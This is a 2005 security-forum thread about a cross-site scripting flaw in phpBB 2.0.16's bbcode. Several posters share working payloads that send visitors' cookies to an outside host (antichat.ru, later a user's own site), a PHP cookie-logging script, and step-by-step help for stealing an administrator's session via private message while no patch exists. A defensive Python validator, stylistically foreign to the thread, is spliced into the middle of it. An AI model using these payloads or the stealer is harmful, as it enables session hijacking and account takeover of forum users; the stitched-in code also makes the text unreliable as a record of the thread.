Waraxe IT Security Portal
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit
Posted: Fri Jul 08, 2005 8:11 pm
zer0-c00l
Advanced user
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!

More info in:
http://www.milw0rm.com/id.php?id=1095
Posted: Sat Jul 09, 2005 2:36 pm
verbatim
Regular user
Joined: Jul 09, 2005
Posts: 11

Waouh, a new flaw in phpBB! Very Happy

I'm totally new to XSS remote cookie exploits; would you be kind enough to explain to me (personally or with a good tutorial) how to use this exploit?

Thank you in advance. Wink
Posted: Sat Jul 09, 2005 9:01 pm
diaga
Regular user
Joined: Jun 27, 2005
Posts: 22

I'm getting

Code:
'
Posted: Sun Jul 10, 2005 12:28 am
WaterBird
Active user
Joined: May 16, 2005
Posts: 37

Hmm, posted and nothing is happening :/
Posted: Sun Jul 10, 2005 2:35 am
subzero
Valuable expert
Joined: Mar 16, 2005
Posts: 42

First of all, nothing is there,
and it won't redirect; that link doesn't exist.

http://www.milw0rm.com/cgi-bin/shell.jpg

This exploit originally comes from http://antichat.ru/txt/phpbb/
and not ccteam, as you can see from the exploit banner on the milw0rm site.

http://antichat.ru/txt/phpbb/ <<< visit here.
Posted: Sun Jul 10, 2005 5:39 am
g30rg3_x
Active user
Joined: Jan 23, 2005
Posts: 31
Location: OutSide Of The PE

First...
Cross-Site Scripting (aka XSS) bugs
can only execute on the client side.

So...
This is not a simple bug that you execute and then you get the admin hash.

And what can I do with this???
You can send an exploit like the one /str0ke put on milw0rm, of course via PM, and you can steal his cookie when he opens the PM..
Of course, as you can read, this bug just works with IE and not with other browsers.

Can you give a PoC??
Umm, the original (in Russian) gives two PoCs.

The first prints a JS alert with the message lol
Code:

[url]www.[url=www.s=''style='top:expression(eval(this.sss));'sss=`alert('lol');this.sss=null`s='][/url][/url]'


The second steals a cookie, but you have to put the value of the background colour in the place where ЦВЕТ_ФОНА (Russian for "background colour") appears
Code:

[color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


Obviously, like the str0ke bug, you have to redirect to your website for stealing the cookie:
http://antichat.ru/b.gif

So that's all about it.

I think this info would be very useful for some people.
If you have questions you can ask here or by my MSN..

Regards
PS: There is no official patch, so have fun...
Posted: Sun Jul 10, 2005 7:45 am
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

Another bbcode flaw, in combination with social engineering, I think *_^

_________________
IO::y3dips->new(http://clog.ammar.web.id);
Posted: Sun Jul 10, 2005 8:54 am
verbatim
Regular user
Joined: Jul 09, 2005
Posts: 11

First, thank you for your answers and your help! Very Happy

subzero wrote:

This exploit originally comes from http://antichat.ru/txt/phpbb/
and not ccteam, as you can see from the exploit banner on the milw0rm site.

http://antichat.ru/txt/phpbb/ <<< visit here.

Yes, I had read it (even if I don't speak Russian Wink).

g30rg3_x wrote:

Of course, as you can read, this bug just works with IE and not with other browsers.

Now I understand why I couldn't see it. lol

g30rg3_x wrote:

The second steals a cookie, but you have to put the value of the background colour in the place where ЦВЕТ_ФОНА appears
Code:

[color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


Obviously, like the str0ke bug, you have to redirect to your website for stealing the cookie:
http://antichat.ru/b.gif

Hmm, I've 2 questions...
1- The colour ЦВЕТ_ФОНА... this value has to be changed to a colour of the target forum, probably to hide the script... but which colour? You said the background, but I don't understand... Embarassed

2- To redirect to our stealer script, by changing the http://antichat.ru/cgi-bin/s.jpg? url...: how to create our own cookie stealer?

By the way, g30rg3_x, did you manage to use this exploit?

Thank you in advance. Wink
Posted: Sun Jul 10, 2005 10:24 am
subzero
Valuable expert
Joined: Mar 16, 2005
Posts: 42

mmm
g30rg3_x

Sorry, but I don't understand what you mean by "only works on IE"??
Wink

verbatim <<= the exploit does work.

Exploit:
http://kisobox.com/exploits/phpbb.2.0.16.xss+cookies.stealer.txt

It will be easier to understand by video:
http://kisobox.com/area51/phpbb2.0.16xss/

It will be better to have your own cookie stealer script rather than depending on antichat.ru
again. If you want to get the admin's password hash, then you just PM him/her.

Wink

Last edited by subzero on Sun Jul 10, 2005 1:55 pm; edited 1 time in total
Posted: Sun Jul 10, 2005 11:20 am
verbatim
Regular user
Joined: Jul 09, 2005
Posts: 11

Great video, subzero! Very Happy

1- I still wonder... when you write
Quote:
template color, so no one can see it.
// you can do it.. by viewing page source code.

the template has many colours... which one do you mean?

2- How to have our own cookie stealer script rather than depending on antichat.ru
again?

Thank you. Smile
Posted: Sun Jul 10, 2005 11:48 am
subzero
Valuable expert
Joined: Mar 16, 2005
Posts: 42

About viewing source code. oohh.. Wink too many aa..
Well, forget about it.

2. Some code
for a cookie stealer:
Code:
<?
if(isset($_GET["c"]))
{
$file = fopen("cookies.txt", "a");
fwrite($file, $_GET["c"]."\n");
fclose($file);
}
?>

Wink
Posted: Sun Jul 10, 2005 12:20 pm
verbatim
Regular user
Joined: Jul 09, 2005
Posts: 11

Ok, so imagine:
1- I create a file cookie.php with this inside:
Code:
<?
if(isset($_GET["c"]))
{
$file = fopen("cookies.txt", "a");
fwrite($file, $_GET["c"]."\n");
fclose($file);
}
?>


2- I change the url of the exploit:
Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

I tried to replace http://antichat.ru/cgi-bin/s.jpg? by http://mysite.com/cookie.php
but it creates no cookies.txt file; there's probably something wrong in my syntax Confused
Posted: Sun Jul 10, 2005 12:21 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

I was testing this bbcode flaw yesterday and it worked even here, at waraxe.us Laughing

Some remarks:

1. It will work with IE only (no Firefox, etc ...)
2. The phpBB team has no clue about this, and so most of the phpBB installations in the world are affected.
3. I made some simple changes to the bbcode regexes, so right now this forum is (hopefully) protected from this specific exploit.

It's interesting to see how much time it takes the phpBB development team to release phpBB version 2.0.17 Wink
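The kind of bbcode-argument check that waraxe's regex change above amounts to, and the reason g30rg3_x's two PoCs work at all, as an added Python example that is not phpBB's code nor anything posted in this thread: it whitelists what a [url=...] argument may contain, lists the posts that fail, and neutralizes the offending tag. The sample posts are constructed (the PoC string is the alert('lol') one quoted earlier in the thread), and the function names are my own.

```python
import re

# Added example, not phpBB's code or anything posted in this thread.
# Both PoCs above rely on the [url=...] argument reaching the generated
# <a href="..."> unescaped, so quotes inside it close the href and smuggle a
# style='top:expression(...)' attribute that old IE evaluates as JavaScript.
# A strict whitelist on the argument removes that whole class of payloads.

# Optional http/https scheme, hostname, optional port, optional path/query
# built only from characters that cannot terminate or extend an attribute.
_SAFE_URL = re.compile(
    r"^(?:https?://)?"
    r"[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?"  # hostname
    r"(?::\d{1,5})?"                               # optional port
    r"(?:/[A-Za-z0-9._~%/+?=&;#-]*)?$"             # optional path/query
)

# Fragments the thread's payloads need; checked separately so the two
# tests fail independently even if the whitelist above is later relaxed.
_ATTACK_MARKERS = re.compile(
    r"""['"`<>]|expression\s*\(|style\s*=|javascript:""", re.IGNORECASE
)

# Opening [url=...] tag; the argument runs up to the first ']'.
_URL_TAG = re.compile(r"\[url=([^\]]*)\]", re.IGNORECASE)


def is_safe_url_arg(arg: str) -> bool:
    """True only for a plain URL that cannot alter the <a> tag it lands in."""
    return bool(_SAFE_URL.match(arg)) and not _ATTACK_MARKERS.search(arg)


def scan_post(text: str) -> list:
    """Return every [url=...] argument in a post that fails validation."""
    return [m.group(1) for m in _URL_TAG.finditer(text)
            if not is_safe_url_arg(m.group(1))]


def neutralize_post(text: str) -> str:
    """Replace unsafe opening [url=...] tags so the post renders inert."""
    def fix(m):
        return m.group(0) if is_safe_url_arg(m.group(1)) else "[url-removed]"
    return _URL_TAG.sub(fix, text)


# Constructed sample posts: a benign link and the alert('lol') PoC from above.
BENIGN_POST = "More info in: [url=http://www.milw0rm.com/id.php?id=1095]advisory[/url]"
POC_POST = ("[url]www.[url=www.s=''style='top:expression(eval(this.sss));'"
            "sss=`alert('lol');this.sss=null`s='][/url][/url]'")

if __name__ == "__main__":
    for post in (BENIGN_POST, POC_POST):
        print(scan_post(post), "->", neutralize_post(post))
```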
Posted: Sun Jul 10, 2005 12:30 pm
subzero
Valuable expert
Joined: Mar 16, 2005
Posts: 42

verbatim

Have you set chmod 777 on the cookies.txt?

Wink It's good if you release the patch for it,
waraxe.. Wink one of my sites is vulnerable too.
Posted: Sun Jul 10, 2005 12:44 pm
verbatim
Regular user
Joined: Jul 09, 2005
Posts: 11

subzero wrote:
verbatim

Have you set chmod 777 on the cookies.txt?


Yes, I have... but this file is still empty Confused
Any ideas?
Is there a mistake here:
Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookie.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

Finally, did you manage to use this exploit with a personal stealer script?

(I know, a lot of questions, but I guess it may help other readers Wink)